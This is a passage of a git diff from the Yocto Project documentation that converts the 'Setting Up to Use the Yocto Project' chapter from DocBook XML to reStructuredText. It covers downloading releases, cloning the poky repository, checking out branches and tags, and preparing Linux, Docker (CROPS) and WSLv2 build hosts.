+described in the "`Accessing Index of
+Releases <#accessing-index-of-releases>`__" section.
+
+.. note::
+
+ The recommended method for accessing Yocto Project components is to
+ use Git to clone a repository and work from within that local
+ repository. The procedure in this section exists should you desire a
+ tarball snapshot of any given component.
+
+1. *Go to the Yocto Project Website:* Open The
+ :yocto_home:`Yocto Project Website <>` in your browser.
+
+#. *Get to the Downloads Area:* Select the "RELEASES" item from the
+ pull-down "DEVELOPMENT" tab menu near the top of the page.
+
+#. *Select a Yocto Project Release:* On the top of the "RELEASE" page currently
+ supported releases are displayed, further down past supported Yocto Project
+ releases are visible. The "Download" links in the rows of the table there
+ will lead to the download tarballs for the release.
+
+ .. note::
+
+ For a "map" of Yocto Project releases to version numbers, see the
+ :yocto_wiki:`Releases </wiki/Releases>` wiki page.
+
+ You can use the "RELEASE ARCHIVE" link to reveal a menu of all Yocto
+ Project releases.
+
+#. *Download Tools or Board Support Packages (BSPs):* Next to the tarballs you
+ will find download tools or BSPs as well. Just select a Yocto Project
+ release and look for what you need.
+
+Accessing Nightly Builds
+------------------------
+
+Yocto Project maintains an area for nightly builds that contains tarball
+releases at https://autobuilder.yocto.io//pub/nightly/. These builds include Yocto
+Project releases ("poky"), toolchains, and builds for supported
+machines.
+
+Should you ever want to access a nightly build of a particular Yocto
+Project component, use the following procedure:
+
+1. *Locate the Index of Nightly Builds:* Open a browser and go to
+ https://autobuilder.yocto.io//pub/nightly/ to access the Nightly Builds.
+
+2. *Select a Date:* Click on the date in which you are interested. If
+ you want the latest builds, use "CURRENT".
+
+3. *Select a Build:* Choose the area in which you are interested. For
+ example, if you are looking for the most recent toolchains, select
+ the "toolchain" link.
+
+4. *Find the Tarball:* Drill down to find the associated tarball.
+
+5. *Download the Tarball:* Click the tarball to download and save a
+ snapshot of the given component.
+
+Cloning and Checking Out Branches
+=================================
+
+To use the Yocto Project for development, you need a release locally
+installed on your development system. This locally installed set of
+files is referred to as the :term:`Source Directory`
+in the Yocto Project documentation.
+
+The preferred method of creating your Source Directory is by using
+:ref:`overview-manual/overview-manual-development-environment:git` to clone a local copy of the upstream
+``poky`` repository. Working from a cloned copy of the upstream
+repository allows you to contribute back into the Yocto Project or to
+simply work with the latest software on a development branch. Because
+Git maintains and creates an upstream repository with a complete history
+of changes and you are working with a local clone of that repository,
+you have access to all the Yocto Project development branches and tag
+names used in the upstream repository.
+
+Cloning the ``poky`` Repository
+-------------------------------
+
+Follow these steps to create a local version of the upstream
+:term:`Poky` Git repository.
+
+1. *Set Your Directory:* Change your working directory to where you want
+ to create your local copy of ``poky``.
+
+2. *Clone the Repository:* The following example command clones the
+ ``poky`` repository and uses the default name "poky" for your local
+ repository:
+ ::
+
+ $ git clone git://git.yoctoproject.org/poky
+ Cloning into 'poky'...
+ remote: Counting objects: 432160, done.
+ remote: Compressing objects: 100% (102056/102056), done.
+ remote: Total 432160 (delta 323116), reused 432037 (delta 323000)
+ Receiving objects: 100% (432160/432160), 153.81 MiB | 8.54 MiB/s, done.
+ Resolving deltas: 100% (323116/323116), done.
+ Checking connectivity... done.
+
+ Unless you
+ specify a specific development branch or tag name, Git clones the
+ "master" branch, which results in a snapshot of the latest
+ development changes for "master". For information on how to check out
+ a specific development branch or on how to check out a local branch
+ based on a tag name, see the "`Checking Out By Branch in
+ Poky <#checking-out-by-branch-in-poky>`__" and `Checking Out By Tag
+ in Poky <#checkout-out-by-tag-in-poky>`__" sections, respectively.
+
+ Once the local repository is created, you can change to that
+ directory and check its status. Here, the single "master" branch
+ exists on your system and by default, it is checked out:
+ ::
+
+ $ cd ~/poky
+ $ git status
+ On branch master
+ Your branch is up-to-date with 'origin/master'.
+ nothing to commit, working directory clean
+ $ git branch
+ * master
+
+ Your local repository of poky is identical to the
+ upstream poky repository at the time from which it was cloned. As you
+ work with the local branch, you can periodically use the
+ ``git pull --rebase`` command to be sure you are up-to-date
+ with the upstream branch.
+
+Checking Out by Branch in Poky
+------------------------------
+
+When you clone the upstream poky repository, you have access to all its
+development branches. Each development branch in a repository is unique
+as it forks off the "master" branch. To see and use the files of a
+particular development branch locally, you need to know the branch name
+and then specifically check out that development branch.
+
+.. note::
+
+ Checking out an active development branch by branch name gives you a
+ snapshot of that particular branch at the time you check it out.
+ Further development on top of the branch that occurs after check it
+ out can occur.
+
+1. *Switch to the Poky Directory:* If you have a local poky Git
+ repository, switch to that directory. If you do not have the local
+ copy of poky, see the
+ ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+ section.
+
+2. *Determine Existing Branch Names:*
+ ::
+
+ $ git branch -a
+ * master
+ remotes/origin/1.1_M1
+ remotes/origin/1.1_M2
+ remotes/origin/1.1_M3
+ remotes/origin/1.1_M4
+ remotes/origin/1.2_M1
+ remotes/origin/1.2_M2
+ remotes/origin/1.2_M3
+ . . .
+ remotes/origin/thud
+ remotes/origin/thud-next
+ remotes/origin/warrior
+ remotes/origin/warrior-next
+ remotes/origin/zeus
+ remotes/origin/zeus-next
+ ... and so on ...
+
+3. *Check out the Branch:* Check out the development branch in which you
+ want to work. For example, to access the files for the Yocto Project
+ &DISTRO; Release (&DISTRO_NAME;), use the following command:
+ ::
+
+ $ git checkout -b &DISTRO_NAME_NO_CAP; origin/&DISTRO_NAME_NO_CAP;
+ Branch &DISTRO_NAME_NO_CAP; set up to track remote branch &DISTRO_NAME_NO_CAP; from origin.
+ Switched to a new branch '&DISTRO_NAME_NO_CAP;'
+
+ The previous command checks out the "&DISTRO_NAME_NO_CAP;" development
+ branch and reports that the branch is tracking the upstream
+ "origin/&DISTRO_NAME_NO_CAP;" branch.
+
+ The following command displays the branches that are now part of your
+ local poky repository. The asterisk character indicates the branch
+ that is currently checked out for work:
+ ::
+
+ $ git branch
+ master
+ * &DISTRO_NAME_NO_CAP;
+
+.. _checkout-out-by-tag-in-poky:
+
+Checking Out by Tag in Poky
+---------------------------
+
+Similar to branches, the upstream repository uses tags to mark specific
+commits associated with significant points in a development branch (i.e.
+a release point or stage of a release). You might want to set up a local
+branch based on one of those points in the repository. The process is
+similar to checking out by branch name except you use tag names.
+
+.. note::
+
+ Checking out a branch based on a tag gives you a stable set of files
+ not affected by development on the branch above the tag.
+
+1. *Switch to the Poky Directory:* If you have a local poky Git
+ repository, switch to that directory. If you do not have the local
+ copy of poky, see the
+ ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`"
+ section.
+
+2. *Fetch the Tag Names:* To checkout the branch based on a tag name,
+ you need to fetch the upstream tags into your local repository:
+ ::
+
+ $ git fetch --tags
+ $
+
+3. *List the Tag Names:* You can list the tag names now:
+ ::
+
+ $ git tag
+ 1.1_M1.final
+ 1.1_M1.rc1
+ 1.1_M1.rc2
+ 1.1_M2.final
+ 1.1_M2.rc1
+ .
+ .
+ .
+ yocto-2.5
+ yocto-2.5.1
+ yocto-2.5.2
+ yocto-2.5.3
+ yocto-2.6
+ yocto-2.6.1
+ yocto-2.6.2
+ yocto-2.7
+ yocto_1.5_M5.rc8
+
+
+4. *Check out the Branch:*
+ ::
+
+ $ git checkout tags/yocto-&DISTRO; -b my_yocto_&DISTRO;
+ Switched to a new branch 'my_yocto_&DISTRO;'
+ $ git branch
+ master
+ * my_yocto_&DISTRO;
+
+ The previous command creates and
+ checks out a local branch named "my_yocto_&DISTRO;", which is based on
+ the commit in the upstream poky repository that has the same tag. In
+ this example, the files you have available locally as a result of the
+ ``checkout`` command are a snapshot of the "&DISTRO_NAME_NO_CAP;"
+ development branch at the point where Yocto Project &DISTRO; was
+ released.
diff --git a/documentation/dev-manual/dev-manual-start.xml b/documentation/dev-manual/dev-manual-start.xml
deleted file mode 100644
index 8cb5631f0d..0000000000
--- a/documentation/dev-manual/dev-manual-start.xml
+++ /dev/null
@@ -1,1287 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-start'>
-
-<title>Setting Up to Use the Yocto Project</title>
-
-<para>
- This chapter provides guidance on how to prepare to use the
- Yocto Project.
- You can learn about creating a team environment that develops using the
- Yocto Project, how to set up a
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>,
- how to locate Yocto Project source repositories, and how to create local
- Git repositories.
-</para>
-
-<section id="usingpoky-changes-collaborate">
- <title>Creating a Team Development Environment</title>
-
- <para>
- It might not be immediately clear how you can use the Yocto
- Project in a team development environment, or how to scale it for a
- large team of developers.
- You can adapt the Yocto Project to many different use cases and
- scenarios;
- however, this flexibility could cause difficulties if you are trying
- to create a working setup that scales effectively.
- </para>
-
- <para>
- To help you understand how to set up this type of environment,
- this section presents a procedure that gives you information
- that can help you get the results you want.
- The procedure is high-level and presents some of the project's most
- successful experiences, practices, solutions, and available
- technologies that have proved to work well in the past;
- however, keep in mind, the procedure here is simply a starting point.
- You can build off these steps and customize the procedure to fit any
- particular working environment and set of practices.
- <orderedlist>
- <listitem><para>
- <emphasis>Determine Who is Going to be Developing:</emphasis>
- You first need to understand who is going to be doing anything
- related to the Yocto Project and determine their roles.
- Making this determination is essential to completing
- subsequent steps, which are to get your equipment together
- and set up your development environment's hardware topology.
- </para>
-
- <para>The following roles exist:
- <itemizedlist>
- <listitem><para>
- <emphasis>Application Developer:</emphasis>
- This type of developer does application level work
- on top of an existing software stack.
- </para></listitem>
- <listitem><para>
- <emphasis>Core System Developer:</emphasis>
- This type of developer works on the contents of the
- operating system image itself.
- </para></listitem>
- <listitem><para>
- <emphasis>Build Engineer:</emphasis>
- This type of developer manages Autobuilders and
- releases. Depending on the specifics of the environment,
- not all situations might need a Build Engineer.
- </para></listitem>
- <listitem><para>
- <emphasis>Test Engineer:</emphasis>
- This type of developer creates and manages automated
- tests that are used to ensure all application and
- core system development meets desired quality
- standards.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Gather the Hardware:</emphasis>
- Based on the size and make-up of the team, get the hardware
- together.
- Ideally, any development, build, or test engineer uses
- a system that runs a supported Linux distribution.
- These systems, in general, should be high performance
- (e.g. dual, six-core Xeons with 24 Gbytes of RAM and plenty
- of disk space).
- You can help ensure efficiency by having any machines used
- for testing or that run Autobuilders be as high performance
- as possible.
- <note>
- Given sufficient processing power, you might also consider
- building Yocto Project development containers to be run
- under Docker, which is described later.
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Understand the Hardware Topology of the Environment:</emphasis>
- Once you understand the hardware involved and the make-up
- of the team, you can understand the hardware topology of the
- development environment.
- You can get a visual idea of the machines and their roles
- across the development environment.
-
-<!--
- The following figure shows a moderately sized Yocto Project
- development environment.
-
- <para role="writernotes">
- Need figure.</para>
--->
-
- </para></listitem>
- <listitem><para>
- <emphasis>Use Git as Your Source Control Manager (SCM):</emphasis>
- Keeping your
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
- (i.e. recipes, configuration files, classes, and so forth)
- and any software you are developing under the control of an SCM
- system that is compatible with the OpenEmbedded build system
- is advisable.
- Of all of the SCMs supported by BitBake, the Yocto Project team strongly
- recommends using
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>.
- Git is a distributed system that is easy to back up,
- allows you to work remotely, and then connects back to the
- infrastructure.
- <note>
- For information about BitBake, see the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </note></para>
-
- <para>It is relatively easy to set up Git services and create
- infrastructure like
- <ulink url='&YOCTO_GIT_URL;'>http://git.yoctoproject.org</ulink>,
- which is based on server software called
- <filename>gitolite</filename> with <filename>cgit</filename>
- being used to generate the web interface that lets you view the
- repositories.
- The <filename>gitolite</filename> software identifies users
- using SSH keys and allows branch-based access controls to
- repositories that you can control as little or as much as
- necessary.
- <note>
- The setup of these services is beyond the scope of this
- manual.
- However, sites such as the following exist that describe
- how to perform setup:
- <itemizedlist>
- <listitem><para>
- <ulink url='http://git-scm.com/book/ch4-8.html'>Git documentation</ulink>:
- Describes how to install
- <filename>gitolite</filename> on the server.
- </para></listitem>
- <listitem><para>
- <ulink url='http://gitolite.com'>Gitolite</ulink>:
- Information for <filename>gitolite</filename>.
- </para></listitem>
- <listitem><para>
- <ulink url='https://git.wiki.kernel.org/index.php/Interfaces,_frontends,_and_tools'>Interfaces, frontends, and tools</ulink>:
- Documentation on how to create interfaces and
- frontends for Git.
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up the Application Development Machines:</emphasis>
- As mentioned earlier, application developers are creating
- applications on top of existing software stacks.
- Following are some best practices for setting up machines
- used for application development:
- <itemizedlist>
- <listitem><para>
- Use a pre-built toolchain that contains the software
- stack itself.
- Then, develop the application code on top of the
- stack.
- This method works well for small numbers of relatively
- isolated applications.
- </para></listitem>
- <listitem><para>
- Keep your cross-development toolchains updated.
- You can do this through provisioning either as new
- toolchain downloads or as updates through a package
- update mechanism using <filename>opkg</filename>
- to provide updates to an existing toolchain.
- The exact mechanics of how and when to do this depend
- on local policy.
- </para></listitem>
- <listitem><para>
- Use multiple toolchains installed locally into
- different locations to allow development across
- versions.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up the Core Development Machines:</emphasis>
- As mentioned earlier, core developers work on the contents of
- the operating system itself.
- Following are some best practices for setting up machines
- used for developing images:
- <itemizedlist>
- <listitem><para>
- Have the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- available on the developer workstations so developers
- can run their own builds and directly rebuild the
- software stack.
- </para></listitem>
- <listitem><para>
- Keep the core system unchanged as much as
- possible and do your work in layers on top of the
- core system.
- Doing so gives you a greater level of portability when
- upgrading to new versions of the core system or Board
- Support Packages (BSPs).
- </para></listitem>
- <listitem><para>
- Share layers amongst the developers of a
- particular project and contain the policy configuration
- that defines the project.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up an Autobuilder:</emphasis>
- Autobuilders are often the core of the development
- environment.
- It is here that changes from individual developers are brought
- together and centrally tested.
- Based on this automated build and test environment, subsequent
- decisions about releases can be made.
- Autobuilders also allow for "continuous integration" style
- testing of software components and regression identification
- and tracking.</para>
-
- <para>See "<ulink url='http://autobuilder.yoctoproject.org'>Yocto Project Autobuilder</ulink>"
- for more information and links to buildbot.
- The Yocto Project team has found this implementation
- works well in this role.
- A public example of this is the Yocto Project
- Autobuilders, which the Yocto Project team uses to test the
- overall health of the project.</para>
-
- <para>The features of this system are:
- <itemizedlist>
- <listitem><para>
- Highlights when commits break the build.
- </para></listitem>
- <listitem><para>
- Populates an
- <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate cache</ulink>
- from which developers can pull rather than requiring
- local builds.
- </para></listitem>
- <listitem><para>
- Allows commit hook triggers, which trigger builds when
- commits are made.
- </para></listitem>
- <listitem><para>
- Allows triggering of automated image booting
- and testing under the QuickEMUlator (QEMU).
- </para></listitem>
- <listitem><para>
- Supports incremental build testing and
- from-scratch builds.
- </para></listitem>
- <listitem><para>
- Shares output that allows developer
- testing and historical regression investigation.
- </para></listitem>
- <listitem><para>
- Creates output that can be used for releases.
- </para></listitem>
- <listitem><para>
- Allows scheduling of builds so that resources
- can be used efficiently.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Set up Test Machines:</emphasis>
- Use a small number of shared, high performance systems
- for testing purposes.
- Developers can use these systems for wider, more
- extensive testing while they continue to develop
- locally using their primary development system.
- </para></listitem>
- <listitem><para>
- <emphasis>Document Policies and Change Flow:</emphasis>
- The Yocto Project uses a hierarchical structure and a
- pull model.
- Scripts exist to create and send pull requests
- (i.e. <filename>create-pull-request</filename> and
- <filename>send-pull-request</filename>).
- This model is in line with other open source projects where
- maintainers are responsible for specific areas of the project
- and a single maintainer handles the final "top-of-tree" merges.
- <note>
- You can also use a more collective push model.
- The <filename>gitolite</filename> software supports both the
- push and pull models quite easily.
- </note></para>
-
- <para>As with any development environment, it is important
- to document the policy used as well as any main project
- guidelines so they are understood by everyone.
- It is also a good idea to have well-structured
- commit messages, which are usually a part of a project's
- guidelines.
- Good commit messages are essential when looking back in time and
- trying to understand why changes were made.</para>
-
- <para>If you discover that changes are needed to the core
- layer of the project, it is worth sharing those with the
- community as soon as possible.
- Chances are if you have discovered the need for changes,
- someone else in the community needs them also.
- </para></listitem>
- <listitem><para>
- <emphasis>Development Environment Summary:</emphasis>
- Aside from the previous steps, some best practices exist
- within the Yocto Project development environment.
- Consider the following:
- <itemizedlist>
- <listitem><para>
- Use
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink>
- as the source control system.
- </para></listitem>
- <listitem><para>
- Maintain your Metadata in layers that make sense
- for your situation.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
- section in the Yocto Project Overview and Concepts
- Manual and the
- "<link linkend='understanding-and-creating-layers'>Understanding and Creating Layers</link>"
- section for more information on layers.
- </para></listitem>
- <listitem><para>
- Separate the project's Metadata and code by using
- separate Git repositories.
- See the
- "<ulink url='&YOCTO_DOCS_OM_URL;#yocto-project-repositories'>Yocto Project Source Repositories</ulink>"
- section in the Yocto Project Overview and Concepts
- Manual for information on these repositories.
- See the
- "<link linkend='locating-yocto-project-source-files'>Locating Yocto Project Source Files</link>"
- section for information on how to set up local Git
- repositories for related upstream Yocto Project
- Git repositories.
- </para></listitem>
- <listitem><para>
- Set up the directory for the shared state cache
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>)
- where it makes sense.
- For example, set up the sstate cache on a system used
- by developers in the same organization and share the
- same source directories on their machines.
- </para></listitem>
- <listitem><para>
- Set up an Autobuilder and have it populate the
- sstate cache and source directories.
- </para></listitem>
- <listitem><para>
- The Yocto Project community encourages you
- to send patches to the project to fix bugs or add
- features.
- If you do submit patches, follow the project commit
- guidelines for writing good commit messages.
- See the "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
- section.
- </para></listitem>
- <listitem><para>
- Send changes to the core sooner than later
- as others are likely to run into the same issues.
- For some guidance on mailing lists to use, see the list
- in the
- "<link linkend='how-to-submit-a-change'>Submitting a Change to the Yocto Project</link>"
- section.
- For a description of the available mailing lists, see
- the
- "<ulink url='&YOCTO_DOCS_REF_URL;#resources-mailinglist'>Mailing Lists</ulink>"
- section in the Yocto Project Reference Manual.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='dev-preparing-the-build-host'>
- <title>Preparing the Build Host</title>
-
- <para>
- This section provides procedures to set up a system to be used as your
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>
- for development using the Yocto Project.
- Your build host can be a native Linux machine (recommended), it can
- be a machine (Linux, Mac, or Windows) that uses
- <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
- which leverages
- <ulink url='https://www.docker.com/'>Docker Containers</ulink> or it can
- be a Windows machine capable of running Windows Subsystem For Linux v2 (WSL).
- <note>
- The Yocto Project is not compatible with
- <ulink url='https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux'>Windows Subsystem for Linux v1</ulink>.
- It is compatible but not officially supported nor validated with WSLv2.
- If you still decide to use WSL please upgrade to
- <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-install'>WSLv2</ulink>.
- </note>
- </para>
-
- <para>
- Once your build host is set up to use the Yocto Project,
- further steps are necessary depending on what you want to
- accomplish.
- See the following references for information on how to prepare for
- Board Support Package (BSP) development and kernel development:
- <itemizedlist>
- <listitem><para>
- <emphasis>BSP Development:</emphasis>
- See the
- "<ulink url='&YOCTO_DOCS_BSP_URL;#preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work With BSP Layers</ulink>"
- section in the Yocto Project Board Support Package (BSP)
- Developer's Guide.
- </para></listitem>
- <listitem><para>
- <emphasis>Kernel Development:</emphasis>
- See the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#preparing-the-build-host-to-work-on-the-kernel'>Preparing the Build Host to Work on the Kernel</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='setting-up-a-native-linux-host'>
- <title>Setting Up a Native Linux Host</title>
-
- <para>
- Follow these steps to prepare a native Linux machine as your
- Yocto Project Build Host:
- <orderedlist>
- <listitem><para>
- <emphasis>Use a Supported Linux Distribution:</emphasis>
- You should have a reasonably current Linux-based host
- system.
- You will have the best results with a recent release of
- Fedora, openSUSE, Debian, Ubuntu, RHEL or CentOS as these
- releases are frequently tested against the Yocto Project
- and officially supported.
- For a list of the distributions under validation and their
- status, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#detailed-supported-distros'>Supported Linux Distributions</ulink>" section
- in the Yocto Project Reference Manual and the wiki page at
- <ulink url='&YOCTO_WIKI_URL;/wiki/Distribution_Support'>Distribution Support</ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Have Enough Free Memory:</emphasis>
- Your system should have at least 50 Gbytes of free disk
- space for building images.
- </para></listitem>
- <listitem><para>
- <emphasis>Meet Minimal Version Requirements:</emphasis>
- The OpenEmbedded build system should be able to run on any
- modern distribution that has the following versions for
- Git, tar, Python and gcc.
- <itemizedlist>
- <listitem><para>
- Git 1.8.3.1 or greater
- </para></listitem>
- <listitem><para>
- tar 1.28 or greater
- </para></listitem>
- <listitem><para>
- Python 3.5.0 or greater.
- </para></listitem>
- <listitem><para>
- gcc 5.0 or greater.
- </para></listitem>
- </itemizedlist>
- If your build host does not meet any of these three listed
- version requirements, you can take steps to prepare the
- system so that you can still use the Yocto Project.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</ulink>"
- section in the Yocto Project Reference Manual for
- information.
- </para></listitem>
- <listitem><para>
- <emphasis>Install Development Host Packages:</emphasis>
- Required development host packages vary depending on your
- build host and what you want to do with the Yocto
- Project.
- Collectively, the number of required packages is large
- if you want to be able to cover all cases.</para>
-
- <para>For lists of required packages for all scenarios,
- see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#required-packages-for-the-build-host'>Required Packages for the Build Host</ulink>"
- section in the Yocto Project Reference Manual.
- </para></listitem>
- </orderedlist>
- Once you have completed the previous steps, you are ready to
- continue using a given development path on your native Linux
- machine.
- If you are going to use BitBake, see the
- "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
- section.
- If you are going to use the Extensible SDK, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
- Chapter in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- If you want to work on the kernel, see the
- <ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;'>Yocto Project Linux Kernel Development Manual</ulink>.
- If you are going to use Toaster, see the
- "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
- section in the Toaster User Manual.
- </para>
- </section>
-
- <section id='setting-up-to-use-crops'>
- <title>Setting Up to Use CROss PlatformS (CROPS)</title>
-
- <para>
- With
- <ulink url='https://github.com/crops/poky-container'>CROPS</ulink>,
- which leverages
- <ulink url='https://www.docker.com/'>Docker Containers</ulink>,
- you can create a Yocto Project development environment that
- is operating system agnostic.
- You can set up a container in which you can develop using the
- Yocto Project on a Windows, Mac, or Linux machine.
- </para>
-
- <para>
- Follow these general steps to prepare a Windows, Mac, or Linux
- machine as your Yocto Project build host:
- <orderedlist>
- <listitem><para>
- <emphasis>Determine What Your Build Host Needs:</emphasis>
- <ulink url='https://www.docker.com/what-docker'>Docker</ulink>
- is a software container platform that you need to install
- on the build host.
- Depending on your build host, you might have to install
- different software to support Docker containers.
- Go to the Docker installation page and read about the
- platform requirements in
- "<ulink url='https://docs.docker.com/install/#supported-platforms'>Supported Platforms</ulink>"
- your build host needs to run containers.
- </para></listitem>
- <listitem><para>
- <emphasis>Choose What To Install:</emphasis>
- Depending on whether or not your build host meets system
- requirements, you need to install "Docker CE Stable" or
- the "Docker Toolbox".
- Most situations call for Docker CE.
- However, if you have a build host that does not meet
- requirements (e.g. Pre-Windows 10 or Windows 10 "Home"
- version), you must install Docker Toolbox instead.
- </para></listitem>
- <listitem><para>
- <emphasis>Go to the Install Site for Your Platform:</emphasis>
- Click the link for the Docker edition associated with
- your build host's native software.
- For example, if your build host is running Microsoft
- Windows Version 10 and you want the Docker CE Stable
- edition, click that link under "Supported Platforms".
- </para></listitem>
- <listitem><para>
- <emphasis>Install the Software:</emphasis>
- Once you have understood all the pre-requisites, you can
- download and install the appropriate software.
- Follow the instructions for your specific machine and
- the type of the software you need to install:
- <itemizedlist>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/docker-for-windows/install/#install-docker-for-windows-desktop-app'>Docker CE for Windows</ulink>
- for Windows build hosts that meet requirements.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/docker-for-mac/install/#install-and-run-docker-for-mac'>Docker CE for Macs</ulink>
- for Mac build hosts that meet requirements.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/toolbox/toolbox_install_windows/'>Docker Toolbox for Windows</ulink>
- for Windows build hosts that do not meet Docker
- requirements.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/toolbox/toolbox_install_mac/'>Docker Toolbox for MacOS</ulink>
- for Mac build hosts that do not meet Docker
- requirements.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/install/linux/docker-ce/centos/'>Docker CE for CentOS</ulink>
- for Linux build hosts running the CentOS
- distribution.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/install/linux/docker-ce/debian/'>Docker CE for Debian</ulink>
- for Linux build hosts running the Debian
- distribution.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/install/linux/docker-ce/fedora/'>Docker CE for Fedora</ulink>
- for Linux build hosts running the Fedora
- distribution.
- </para></listitem>
- <listitem><para>
- Install
- <ulink url='https://docs.docker.com/install/linux/docker-ce/ubuntu/'>Docker CE for Ubuntu</ulink>
- for Linux build hosts running the Ubuntu
- distribution.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>Optionally Orient Yourself With Docker:</emphasis>
- If you are unfamiliar with Docker and the container
- concept, you can learn more here -
- <ulink url='https://docs.docker.com/get-started/'></ulink>.
- </para></listitem>
- <listitem><para>
- <emphasis>Launch Docker or Docker Toolbox:</emphasis>
- You should be able to launch Docker or the Docker Toolbox
- and have a terminal shell on your development host.
- </para></listitem>
- <listitem><para>
- <emphasis>Set Up the Containers to Use the Yocto Project:</emphasis>
- Go to
- <ulink url='https://github.com/crops/docker-win-mac-docs/wiki'></ulink>
- and follow the directions for your particular
- build host (i.e. Linux, Mac, or Windows).</para>
-
- <para>Once you complete the setup instructions for your
- machine, you have the Poky, Extensible SDK, and Toaster
- containers available.
- You can click those links from the page and learn more
- about using each of those containers.
- </para></listitem>
- </orderedlist>
- Once you have a container set up, everything is in place to
- develop just as if you were running on a native Linux machine.
- If you are going to use the Poky container, see the
- "<link linkend='cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</link>"
- section.
- If you are going to use the Extensible SDK container, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
- Chapter in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- If you are going to use the Toaster container, see the
- "<ulink url='&YOCTO_DOCS_TOAST_URL;#toaster-manual-setup-and-use'>Setting Up and Using Toaster</ulink>"
- section in the Toaster User Manual.
- </para>
- </section>
-
- <section id='setting-up-to-use-wsl'>
- <title>Setting Up to Use Windows Subsystem For Linux (WSLv2)</title>
-
- <para>
- With <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-about'>
- Windows Subsystem for Linux (WSLv2)</ulink>, you can create a
- Yocto Project development environment that allows you to build
- on Windows. You can set up a Linux distribution inside Windows
- in which you can develop using the Yocto Project.
- </para>
-
- <para>
- Follow these general steps to prepare a Windows machine using WSLv2
- as your Yocto Project build host:
- <orderedlist>
- <listitem><para>
- <emphasis>Make sure your Windows 10 machine is capable of running WSLv2:</emphasis>
-
- WSLv2 is only available for Windows 10 builds > 18917. To
- check which build version you are running, you may open a
- command prompt on Windows and execute the command "ver".
- <literallayout class='monospaced'>
- C:\Users\myuser> ver
-
- Microsoft Windows [Version 10.0.19041.153]
- </literallayout>
- If your build is capable of running WSLv2 you may continue,
- for more information on this subject or instructions on how
- to upgrade to WSLv2 visit <ulink url='https://docs.microsoft.com/en-us/windows/wsl/wsl2-install'>Windows 10 WSLv2</ulink>
- </para></listitem>
- <listitem><para>
- <emphasis>Install the Linux distribution of your choice inside Windows 10:</emphasis>
- Once you know your version of Windows 10 supports WSLv2,
- you can install the distribution of your choice from the
- Microsoft Store.
- Open the Microsoft Store and search for Linux. While there
- are several Linux distributions available, the assumption
- is that your pick will be one of the distributions supported
- by the Yocto Project as stated on the instructions for
- using a native Linux host.
- After making your selection, simply click "Get" to download
- and install the distribution.
- </para></listitem>
- <listitem><para>
- <emphasis>Check your Linux distribution is using WSLv2:</emphasis>
- Open a Windows PowerShell and run:
- <literallayout class='monospaced'>
- C:\WINDOWS\system32> wsl -l -v
- NAME STATE VERSION
